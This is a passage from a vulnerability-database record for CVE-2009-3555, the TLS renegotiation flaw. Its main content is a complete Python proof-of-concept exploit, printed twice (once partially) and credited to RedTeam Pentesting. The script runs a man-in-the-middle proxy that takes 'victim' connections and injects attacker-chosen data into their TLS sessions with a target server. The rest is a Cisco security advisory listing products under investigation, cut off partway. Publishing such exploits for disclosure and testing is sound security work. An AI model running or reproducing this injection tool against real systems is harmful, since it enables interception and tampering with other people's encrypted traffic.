threading.Thread(target=forward, args=(sslsock.sock, victim))\n t1.start()\n\n t2 = threading.Thread(target=forward, args=(victim, sslsock.sock))\n t2.start()\n\n if not options.drop:\n t1.join()\n sslsock.sock.close()\n\n t2.join()\n victim.close()\n\n\n\nif __name__ == \"__main__\":\n parser = optparse.OptionParser()\n parser.add_option('-l', '--listen', dest='listen_port', help='port to listen on', metavar='PORT', type='int', default=8443)\n parser.add_option('-b', '--bind', dest='bind_address', help='address to bind to', metavar='ADDRESS', default='0.0.0.0')\n parser.add_option('-t', '--target', dest='target', help='host and port to connect to', metavar='HOST:PORT' )\n parser.add_option('-i', '--inject', dest='inject', help='string to inject', metavar='DATA')\n parser.add_option('', '--inject-file', dest='inject_file', help='inject data from a file', metavar='FILE')\n parser.add_option('', '--inject-base64', dest='inject_base64', help='string to inject, base64-encoded', metavar='DATA')\n parser.add_option('-o', '--one-shot', dest='one_shot', action='store_true', help='only mitm the first connection attempt, forward all other connections')\n parser.add_option('-d', '--drop-responses', dest='drop', action=\"store_true\", default=False, help='drop server responses after renegotiating')\n\n (options, args) = parser.parse_args()\n\n if len([i for i in (options.inject, options.inject_file, options.inject_base64) if i]) != 1:\n print 'Exactly one injection option must be specified'\n sys.exit(1)\n\n if options.inject_file:\n try:\n options.inject = open(options.inject_file, 'r').read()\n except IOError, ex:\n print ex\n sys.exit(1)\n\n if options.inject_base64:\n import base64\n try:\n options.inject = base64.decodestring(options.inject_base64)\n except base64.binascii.Error, ex:\n print 'Error decoding base64 data: %s' % ex\n sys.exit(1)\n\n\n if not options.listen_port or \\\n not options.bind_address or \\\n not options.target or \\\n not options.inject:\n parser.print_help()\n sys.exit(1)\n\n target = options.target.split(':')\n if len(target)==2:\n try:\n target[1] = int(target[1])\n except ValueError:\n target[1] = None\n if len(target)!=2 or not target[0] or not target[1]:\n print 'Target \\'%s\\' not in format HOST:PORT' % options.target\n sys.exit(1)\n\n options.target = tuple(target)\n\n try:\n listensocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n listensocket.bind((options.bind_address, options.listen_port))\n print 'Listening on %s:%u' % (options.bind_address, options.listen_port)\n except socket.error, ex:\n print 'Couldn\\'t listen on %s:%u' % (options.bind_address, options.listen_port)\n print 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\n sys.exit(1)\n\n listensocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n listensocket.listen(5)\n\n mitmcount = 0\n\n while True:\n try:\n victim, victimaddr = listensocket.accept()\n print 'New connection from %s:%u' % victimaddr\n\n threading.Thread(target=handle_victim, args=(victim, options, mitmcount)).start()\n mitmcount += 1\n\n except KeyboardInterrupt, ex:\n print '\\nAborted by user, exiting...'\n listensocket.close()\n sys.exit(1)", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T15:57:49", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "TLS Renegotiation Vulnerability PoC", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3555"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-67231", "id": "SSV:67231", "sourceData": "\n #!/usr/bin/env python\r\n\r\n######################################\r\n# #\r\n# RedTeam Pentesting GmbH #\r\n# kontakt@redteam-pentesting.de #\r\n# http://www.redteam-pentesting.de #\r\n# #\r\n######################################\r\n\r\n# PoC exploit for the TLS renegotiation vulnerability (CVE-2009-3555)\r\n\r\n# License\r\n# -------\r\n# CC-BY-SA http://creativecommons.org/licenses/by-sa/3.0/\r\n\r\n# Timeline\r\n# --------\r\n# 2009-12-21 initial public release\r\n\r\n# Known Issues\r\n# ------------\r\n# Firefox: if it fails connecting to a TLS site too often, falls back to\r\n# issuing SSLv2 ClientHello only until browser is restarted\r\n#\r\n# wget: attempts SSLv2 ClientHello by default\r\n\r\n# References\r\n# ----------\r\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\r\n# http://www.phonefactor.com/sslgap\r\n# http://www.extendedsubset.com/\r\n# http://www.g-sec.lu/practicaltls.pdf\r\n# http://tools.ietf.org/html/draft-ietf-tls-renegotiation-01\r\n\r\nimport tlslite\r\nimport tlslite.api\r\nimport tlslite.messages\r\nimport tlslite.constants\r\nimport struct\r\nimport socket\r\nimport threading\r\nimport array\r\nimport sys\r\nimport optparse\r\n\r\n\r\nif not hasattr(threading.Thread, 'name'):\r\n # emulate python 2.6 threading module for earlier versions\r\n threading.current_thread = threading.currentThread\r\n setattr(threading.Thread, 'name',\r\n property(threading.Thread.getName, threading.Thread.setName))\r\n\r\ndef forward(sock1, sock2):\r\n sock1.settimeout(1.0)\r\n while True:\r\n try:\r\n data = sock1.recv(4096)\r\n if not data:\r\n return\r\n sock2.send(data)\r\n except socket.error, ex_error:\r\n if ex_error[0] == 104: # Connection reset by peer\r\n return\r\n except socket.timeout, ex_timeout:\r\n pass\r\n\r\n\r\nclass MessageWrapper(object):\r\n def __init__(self, version = (3, 1), ssl2 = False):\r\n self.contentType = tlslite.messages.ContentType.handshake\r\n self.ssl2 = ssl2\r\n self.client_version = version\r\n\r\n def setType(self, type):\r\n self.contentType = type\r\n\r\n def addBytes(self, bytes):\r\n self.bytes = bytes\r\n\r\n def write(self, trial=False):\r\n if trial:\r\n raise Exception('Unsupported')\r\n return array.array('B', self.bytes)\r\n\r\ndef send_record(sock, msg_type, version_major, version_minor, record):\r\n msg = struct.pack('!BBBH', msg_type, version_major, version_minor, len(record))\r\n if type(record) != str:\r\n msg += record.tostring()\r\n else:\r\n msg += record\r\n sock.send(msg)\r\n\r\ndef send_encapsulated(sslsock, type, messagebytes, version = (3, 1)):\r\n msg = MessageWrapper(version)\r\n msg.addBytes(struct.unpack('B'*len(messagebytes), messagebytes))\r\n msg.setType(type)\r\n for dummy in sslsock._sendMsg(msg, True):\r\n pass\r\n\r\ndef decrypt_record(sslsock, type, recordbytes):\r\n for result in sslsock._decryptRecord(type, array.array('B', recordbytes)):\r\n pass\r\n return result\r\n\r\ndef recv_record(sock):\r\n try:\r\n header = sock.recv(5)\r\n if not header:\r\n return None, None, None, None\r\n msg_type, msg_version_major, msg_version_minor, msg_length = struct.unpack('!BBBH', header)\r\n record = ''\r\n while len(record) != msg_length:\r\n record += sock.recv(msg_length - len(record))\r\n return msg_type, msg_version_major, msg_version_minor, record\r\n except socket.error, ex:\r\n if ex[0] == 104: # Connection reset by peer\r\n return\r\n\r\ndef recv_clienthello(sock):\r\n header_bytes = []\r\n header_bytes.append(sock.recv(1))\r\n header_bytes[0] = struct.unpack('!B', header_bytes[0])[0]\r\n if header_bytes[0] & 0x80:\r\n # Version 2.0 Client "Record Layer"\r\n header_bytes.append(sock.recv(1))\r\n header_bytes[1] = struct.unpack('!B', header_bytes[1])[0]\r\n msg_length = (header_bytes[0] & 0x7f) << 8 | header_bytes[1]\r\n msg_version_major = 2\r\n msg_version_minor = 0\r\n msg_type = tlslite.constants.ContentType.handshake\r\n record = sock.recv(msg_length)\r\n else:\r\n header = sock.recv(4)\r\n msg_type = header_bytes[0]\r\n msg_version_major, msg_version_minor, msg_length = struct.unpack('!BBH', header)\r\n record = sock.recv(msg_length)\r\n\r\n return msg_type, msg_version_major, msg_version_minor, record\r\n\r\ndef send_hello_request(sock):\r\n sock.send("\\x16" # Record Layer: Handshake Message\r\n +"\\x03\\x01" # Record Layer Version: TLS 1.0\r\n +"\\x00\\x04" # Record Layer Length: 4\r\n +"\\x00" # Handshake Message Type: Hello Request\r\n +"\\x00\\x00\\x00") # Handshake Message Length: 0\r\n\r\ndef send_protocol_version_alert(sock):\r\n sock.send("\\x15" # Record Layer: Alert"\r\n +"\\x03\\x01" # Record Layer Version: TLS 1.0\r\n +"\\x00\\x02" # Record Layer Length: 2\r\n +"\\x00" # Alert Message: fatal\r\n +"\\x46") # Alert Message: protocol version\r\n\r\n\r\ndef handle_victim(victim, options, mitmcount):\r\n\r\n if options.one_shot and mitmcount != 0:\r\n print threading.current_thread().name, '--one-shot specified and initial connection already handled, forwarding only'\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n sock.connect(options.target)\r\n print threading.current_thread().name, 'Connected to target %s:%u' % options.target\r\n except socket.error, ex:\r\n print threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target\r\n print threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\r\n sys.exit(1)\r\n\r\n t1 = threading.Thread(target=forward, args=(sock, victim))\r\n t1.start()\r\n\r\n t2 = threading.Thread(target=forward, args=(victim, sock))\r\n t2.start()\r\n\r\n t1.join()\r\n sock.close()\r\n\r\n t2.join()\r\n victim.close()\r\n return\r\n\r\n # obtain initial "client hello" message\r\n msg_type, msg_version_major, msg_version_minor, hello_msg = recv_clienthello(victim)\r\n if msg_version_major == 2:\r\n print threading.current_thread().name, "client sent SSLv2 client hello message, exiting thread"\r\n return\r\n\r\n tls_version = (msg_version_major, msg_version_minor)\r\n type, length, version_major, version_minor, random, session_id_length = struct.unpack('!B3sBB32sB', hello_msg[:39])\r\n resume_session = (session_id_length != 0)\r\n if resume_session:\r\n print threading.current_thread().name, "client attempting to resume session"\r\n\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n sock.connect(options.target)\r\n print threading.current_thread().name, 'Connected to target %s:%u' % options.target\r\n except socket.error, ex:\r\n print threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target\r\n print threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\r\n sys.exit(1)\r\n\r\n\r\n sslsock = tlslite.api.TLSConnection(sock)\r\n handshake_settings = tlslite.HandshakeSettings.HandshakeSettings()\r\n handshake_settings.minVersion = tls_version\r\n handshake_settings.maxVersion = tls_version\r\n sslsock.handshakeClientCert(settings = handshake_settings)\r\n\r\n # inject prefix\r\n sslsock.write(options.inject)\r\n print threading.current_thread().name, 'Injected %s' % repr(options.inject)\r\n\r\n # send original "client hello" message over the encrypted channel\r\n send_encapsulated(sslsock, 22, hello_msg, tls_version)\r\n\r\n # now receive serveral TLS messages from the server, decrypt them, and forward\r\n # them to the client, until the server sends "server hello done"\r\n # these messages include "server hello", "certificate", "server key exchange",\r\n # unless the client is trying to resume a previous session\r\n print threading.current_thread().name, "about to receive server handshake messages"\r\n server_handshake_done = False\r\n while not server_handshake_done:\r\n msg_type, msg_version_major, msg_version_minor, result = recv_record(sslsock.sock)\r\n if result:\r\n result = decrypt_record(sslsock, msg_type, result)\r\n send_record(victim, msg_type, msg_version_major, msg_version_minor, result)\r\n if result[0] == 0x0e: # server hello done - should terminate handshake\r\n server_handshake_done = True\r\n elif resume_session and msg_type == 0x14: # change cipher spec - probably irrelevant\r\n server_handshake_done = True\r\n else:\r\n print threading.current_thread().name, 'receive from server failed, exiting thread'\r\n return\r\n print threading.current_thread().name, "server handshake done"\r\n\r\n\r\n # now its the the client's turn to send some messages, e.g.\r\n # "client key exchange" and "change cipher spec"\r\n print threading.current_thread().name, "about to receive client handshake messages"\r\n handshake_finished = False\r\n while not handshake_finished:\r\n msg_type, msg_version_major, msg_version_minor, record = recv_record(victim)\r\n print threading.current_thread().name, msg_type\r\n send_encapsulated(sslsock, msg_type, record, tls_version)\r\n if msg_type == 0x14: # change cipher spec\r\n handshake_finished = True\r\n\r\n print threading.current_thread().name, "client handshake done"\r\n\r\n # message after "change cipher spec" must be sent in the "clear"\r\n msg_type, msg_version_major, msg_version_minor, record = recv_record(victim)\r\n send_record(sslsock.sock, msg_type, msg_version_major, msg_version_minor, record)\r\n\r\n # server should now send "change cipher spec" message, we decrypt and send that to the victim\r\n msg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock)\r\n result = decrypt_record(sslsock, msg_type, record)\r\n send_record(victim, msg_type, msg_version_major, msg_version_minor, result)\r\n\r\n # finalize handshake\r\n msg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock)\r\n if record:\r\n send_record(victim, msg_type, msg_version_major, msg_version_minor, record)\r\n else:\r\n sslsock.sock.close()\r\n victim.close()\r\n del sslsock\r\n return\r\n\r\n\r\n\r\n # the rest is just forwarding TLS records between both parties,\r\n # which we cannot interfere with anymore, apart from dropping server\r\n # responses\r\n if options.drop:\r\n sslsock.sock.close()\r\n del sslsock\r\n else:\r\n t1 = threading.Thread(target=forward, args=(sslsock.sock, victim))\r\n t1.start()\r\n\r\n t2 = threading.Thread(target=forward, args=(victim, sslsock.sock))\r\n t2.start()\r\n\r\n if not options.drop:\r\n t1.join()\r\n sslsock.sock.close()\r\n\r\n t2.join()\r\n victim.close()\r\n\r\n\r\n\r\nif __name__ == "__main__":\r\n parser = optparse.OptionParser()\r\n parser.add_option('-l', '--listen', dest='listen_port', help='port to listen on', metavar='PORT', type='int', default=8443)\r\n parser.add_option('-b', '--bind', dest='bind_address', help='address to bind to', metavar='ADDRESS', default='0.0.0.0')\r\n parser.add_option('-t', '--target', dest='target', help='host and port to connect to', metavar='HOST:PORT' )\r\n parser.add_option('-i', '--inject', dest='inject', help='string to inject', metavar='DATA')\r\n parser.add_option('', '--inject-file', dest='inject_file', help='inject data from a file', metavar='FILE')\r\n parser.add_option('', '--inject-base64', dest='inject_base64', help='string to inject, base64-encoded', metavar='DATA')\r\n parser.add_option('-o', '--one-shot', dest='one_shot', action='store_true', help='only mitm the first connection attempt, forward all other connections')\r\n parser.add_option('-d', '--drop-responses', dest='drop', action="store_true", default=False, help='drop server responses after renegotiating')\r\n\r\n (options, args) = parser.parse_args()\r\n\r\n if len([i for i in (options.inject, options.inject_file, options.inject_base64) if i]) != 1:\r\n print 'Exactly one injection option must be specified'\r\n sys.exit(1)\r\n\r\n if options.inject_file:\r\n try:\r\n options.inject = open(options.inject_file, 'r').read()\r\n except IOError, ex:\r\n print ex\r\n sys.exit(1)\r\n\r\n if options.inject_base64:\r\n import base64\r\n try:\r\n options.inject = base64.decodestring(options.inject_base64)\r\n except base64.binascii.Error, ex:\r\n print 'Error decoding base64 data: %s' % ex\r\n sys.exit(1)\r\n\r\n\r\n if not options.listen_port or \\\r\n not options.bind_address or \\\r\n not options.target or \\\r\n not options.inject:\r\n parser.print_help()\r\n sys.exit(1)\r\n\r\n target = options.target.split(':')\r\n if len(target)==2:\r\n try:\r\n target[1] = int(target[1])\r\n except ValueError:\r\n target[1] = None\r\n if len(target)!=2 or not target[0] or not target[1]:\r\n print 'Target \\'%s\\' not in format HOST:PORT' % options.target\r\n sys.exit(1)\r\n\r\n options.target = tuple(target)\r\n\r\n try:\r\n listensocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n listensocket.bind((options.bind_address, options.listen_port))\r\n print 'Listening on %s:%u' % (options.bind_address, options.listen_port)\r\n except socket.error, ex:\r\n print 'Couldn\\'t listen on %s:%u' % (options.bind_address, options.listen_port)\r\n print 'Error code %u, \\'%s\\'' % (ex[0], ex[1])\r\n sys.exit(1)\r\n\r\n listensocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n listensocket.listen(5)\r\n\r\n mitmcount = 0\r\n\r\n while True:\r\n try:\r\n victim, victimaddr = listensocket.accept()\r\n print 'New connection from %s:%u' % victimaddr\r\n\r\n threading.Thread(target=handle_victim, args=(victim, options, mitmcount)).start()\r\n mitmcount += 1\r\n\r\n except KeyboardInterrupt, ex:\r\n print '\\nAborted by user, exiting...'\r\n listensocket.close()\r\n sys.exit(1)\r\n\r\n\n ", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-67231"}, {"lastseen": "2017-11-19T18:30:52", "description": "No description provided by source.", "published": "2009-11-10T00:00:00", "type": "seebug", "title": "Cisco Security Advisory: Transport Layer Security Renegotiation Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3555"], "modified": "2009-11-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12600", "id": "SSV:12600", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nCisco Security Advisory: Transport Layer Security Renegotiation\r\nVulnerability\r\n\r\nAdvisory ID: cisco-sa-20091109-tls\r\n\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20091109-tls.shtml\r\n\r\nRevision 1.0\r\n\r\nFor Public Release 2009 November 9 1600 UTC (GMT)\r\n\r\nSummary\r\n=======\r\n\r\nAn industry-wide vulnerability exists in the Transport Layer Security\r\n(TLS) protocol that could impact any Cisco product that uses any version\r\nof TLS and SSL. The vulnerability exists in how the protocol handles\r\nsession renegotiation and exposes users to a potential man-in-the-middle\r\nattack.\r\n\r\nThis advisory is posted at\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20091109-tls.shtml.\r\n\r\nAffected Products\r\n=================\r\n\r\nCisco is currently evaluating products for possible exposure to these\r\nTLS issues. Products will only be listed in the Vulnerable Products or\r\nProducts Confirmed Not Vulnerable sections of this advisory when a final\r\ndetermination about product exposure is made. Products that are not\r\nlisted in either of these two sections are still being evaluated.\r\n\r\nVulnerable Products\r\n- -------------------\r\n\r\nThis section will be updated when more information is available.\r\n\r\nProducts Confirmed Not Vulnerable\r\n- ---------------------------------\r\n\r\nThe following products are confirmed not vulnerable:\r\n\r\n * Cisco AnyConnect VPN Client\r\n\r\nThis section will be updated when more information is available.\r\n\r\nDetails\r\n=======\r\n\r\nTLS and its predecessor, SSL, are cryptographic protocols that provide\r\nsecurity for communications over IP data networks such as the Internet.\r\nAn industry-wide vulnerability exists in the TLS protocol that could\r\nimpact any Cisco product that uses any version of TLS and SSL. The\r\nvulnerability exists in how the protocol handles session renegotiation\r\nand exposes users to a potential man-in-the-middle attack.\r\n\r\nThe following Cisco Bug IDs are being used to track potential exposure\r\nto the SSL and TLS issues. The bugs listed below do not confirm\r\nthat a product is vulnerable, but rather that the product is under\r\ninvestigation by the appropriate product teams.\r\n\r\nRegistered Cisco customers can view these bugs via Cisco's Bug Toolkit:\r\nhttp://www.cisco.com/pcgi-bin/Support/Bugtool/launch_bugtool.pl\r\n\r\n+------------------------------------------------------------+\r\n| Product | Bug ID |\r\n|----------------------------+-------------------------------|\r\n| Cisco Adaptive Security | CSCtd01491 |\r\n| Device Manager (ASDM) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco AON Software | CSCtd01646 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco AON Healthcare for | CSCtd01652 |\r\n| HIPAA and ePrescription | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Application and | CSCtd01529 |\r\n| Content Networking System | |\r\n| (ACNS) Software | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Application | CSCtd01480 |\r\n| Networking Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco ASA 5500 Series | CSCtd00697 |\r\n| Adaptive Security | |\r\n| Appliances | |\r\n|----------------------------+-------------------------------|\r\n| Cisco ASA Advanced | |\r\n| Inspection and Prevention | CSCtd01539 |\r\n| (AIP) Security Services | |\r\n| Module | |\r\n|----------------------------+-------------------------------|\r\n| Cisco AVS 3100 Series | CSCtd01566 |\r\n| Application Velocity | |\r\n| System | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Catalyst 6500 Series | CSCtd06389 |\r\n| SSL Services Module | |\r\n|----------------------------+-------------------------------|\r\n| Firewall Services Module | CSCtd04061 |\r\n| FWSM | |\r\n|----------------------------+-------------------------------|\r\n| Cisco CSS 11000 Series | CSCtd01636 |\r\n| Content Services Switches | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified SIP Phones | CSCtd01446 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Data Center Network | CSCtd02635 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Data Mobility | CSCtd02642 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Digital Media | CSCtd01703 |\r\n| Encoders | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Digital Media | CSCtd01692 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Digital Media | CSCtd01718 |\r\n| Players | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Emergency Responder | CSCtd02650 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IOS Software | CSCtd00658 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IOS XE Software | CSCtd00658 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IOS XR Software | CSCtd02658 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IP Communicator | CSCtd02662 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| CATOS | CSCtd00662 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco IronPort Appliances | CSCtd02069 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified MeetingPlace | CSCtd02709 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco NAC Appliance (Clean | CSCtd01453 |\r\n| Access) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco NAC Guest Server | CSCtd01462 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco NAC Profiler | CSCtd02716 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Network Analysis | CSCtd02729 |\r\n| Module Software (NAM) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Network Registrar | CSCtd02748 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco ONS 15500 Series | CSCtd02769 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Physical Access | CSCtd02777 |\r\n| Gateways | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Physical Access | CSCtd03912 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Physical Security | CSCtd03920 |\r\n| ISM | |\r\n|----------------------------+-------------------------------|\r\n| Cisco QoS Device Manager | CSCtd03923 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Secure Access | CSCtd00725 |\r\n| Control Server (ACS) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Secure Desktop | CSCtd03928 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Secure Services | CSCtd03935 |\r\n| Client | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Security Agent CSA | CSCtd02689 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Security Monitoring, | CSCtd02654 |\r\n| Analysis and Response | |\r\n| System (MARS) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified IP Phones | CSCtd04121 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Service Control | CSCtd04171 |\r\n| Subscriber Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco TelePresence Manager | CSCtd01771 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Telepresence for Consumer | CSCtd01752 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco TelePresence | CSCtd01742 |\r\n| Recording Server | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Network Asset | CSCtd04198 |\r\n| Collector | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified | CSCtd01282 |\r\n| Communications Manager | |\r\n| (CallManager) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Business | CSCtd05731 |\r\n| Attendant Console | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Contact | CSCtd05790 |\r\n| Center Enterprise | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Contact | CSCtd05790 |\r\n| Center Express | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Contact | CSCtd05755 |\r\n| Center Management Portal | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Contact | CSCtd05790 |\r\n| Center Products | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Department | CSCtd05733 |\r\n| Attendant Console | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified E-Mail | CSCtd05756 |\r\n| Interaction Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Enterprise | CSCtd05735 |\r\n| Attendant Console | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Mobile | CSCtd05762 |\r\n| Communicator | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Mobility | CSCtd05786 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Mobility | CSCtd05783 |\r\n| Advantage | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Operations | CSCtd05784 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Personal | CSCtd05759 |\r\n| Communicator | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Presence | CSCtd05791 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Provisioning | CSCtd05777 |\r\n| Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Quick | CSCtd05738 |\r\n| Connect | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Service | CSCtd05780 |\r\n| Monitor | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified Service | CStCd05778 |\r\n| Statistics Manager | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unified SIP Proxy | CSCtd05765 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Unity | CSCtd02855 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco NX-OS Software | CSCtd00699 and CSCtd00703 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Video Portal | CSCtd04097 |\r\n| | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Video Surveillance | CSCtd02831 |\r\n| Media Server Software | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Video Surveillance | CSCtd02780 |\r\n| Operations Manager | |\r\n| Software | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Wide Area File | CSCtd04106 |\r\n| Services Software (WAFS) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Wireless Control | CSCtd01625 |\r\n| System | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Wireless LAN | CSCtd01611 |\r\n| Controller (WLAN) | |\r\n|----------------------------+-------------------------------|\r\n| Cisco Wireless Location | CSCtd04115 |\r\n| Appliance | |\r\n|----------------------------+-------------------------------|\r\n| CiscoWorks Common Services | CSCtd01597 |\r\n| Software | |\r\n|----------------------------+-------------------------------|\r\n| CiscoWorks Wireless LAN | CSCtd04111 |\r\n| Solution Engine (WLSE) | |\r\n+------------------------------------------------------------+\r\n\r\nThis vulnerability has been assigned the Common Vulnerabilities and\r\nExposures (CVE) identifier CVE-2009-3555.\r\n\r\n\r\nVulnerability Scoring Details\r\n+----------------------------\r\n\r\nCisco has provided scores for the vulnerability in this advisory based\r\non the Common Vulnerability Scoring System (CVSS). The CVSS scoring in\r\nthis Security Advisory is done in accordance with CVSS version 2.0.\r\n\r\nCVSS is a standards-based scoring method that conveys vulnerability\r\nseverity and helps determine urgency and priority of response.\r\n\r\nCisco has provided a base and temporal score. Customers can then\r\ncompute environmental scores to assist in determining the impact of the\r\nvulnerability in individual networks.\r\n\r\nCisco has provided an FAQ to answer additional questions regarding CVSS\r\nat:\r\n\r\nhttp://www.cisco.com/web/about/security/intelligence/cvss-qandas.html\r\n\r\nCisco has also provided a CVSS calculator to help compute the\r\nenvironmental impact for individual networks at:\r\n\r\nhttp://intellishield.cisco.com/security/alertmanager/cvss\r\n\r\n* TLS Renegotiation Vulnerability (all Cisco Bugs above)\r\n\r\nCVSS Base Score - 4.3\r\n Access Vector - Network\r\n Access Complexity - Medium\r\n Authentication - None\r\n Confidentiality Impact - None\r\n Integrity Impact - Partial\r\n Availability Impact - None\r\n\r\nCVSS Temporal Score - 4.1\r\n Exploitability - Functional\r\n Remediation Level - Unavailable\r\n Report Confidence - Confirmed\r\n\r\n\r\nImpact\r\n======\r\n\r\nThis section will be updated when more information is available.\r\n\r\nSoftware Versions and Fixes\r\n===========================\r\n\r\nThis section will be updated to include fixed software versions for\r\naffected Cisco products as they become available.\r\n\r\nWorkarounds\r\n===========\r\n\r\nWorkarounds are being investigated. This section will be updated when\r\nmore information becomes available.\r\n\r\nObtaining Fixed Software\r\n========================\r\n\r\nCisco has released free software updates that address this\r\nvulnerability. Prior to deploying software, customers should consult\r\ntheir maintenance provider or check the software for feature set\r\ncompatibility and known issues specific to their environment.\r\n\r\nCustomers may only install and expect support for the feature\r\nsets they have purchased. By installing, downloading, accessing\r\nor otherwise using such software upgrades, customers agree to be\r\nbound by the terms of Cisco's software license terms found at\r\nhttp://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,\r\nor as otherwise set forth at Cisco.com Downloads at\r\nhttp://www.cisco.com/public/sw-center/sw-usingswc.shtml.\r\n\r\nDo not contact psirt@cisco.com or security-alert@cisco.com for software\r\nupgrades.\r\n\r\nCustomers with Service Contracts\r\n- --------------------------------\r\n\r\nCustomers with contracts should obtain upgraded software through their\r\nregular update channels. For most customers, this means that upgrades\r\nshould be obtained through the Software Center on Cisco's worldwide\r\nwebsite at http://www.cisco.com.\r\n\r\nCustomers using Third Party Support Organizations\r\n- -------------------------------------------------\r\n\r\nCustomers whose Cisco products are provided or maintained through prior\r\nor existing agreements with third-party support organizations, such\r\nas Cisco Partners, authorized resellers, or service providers should\r\ncontact that support organization for guidance and assistance with the\r\nappropriate course of action in regards to this advisory.\r\n\r\nThe effectiveness of any workaround or fix is dependent on specific\r\ncustomer situations, such 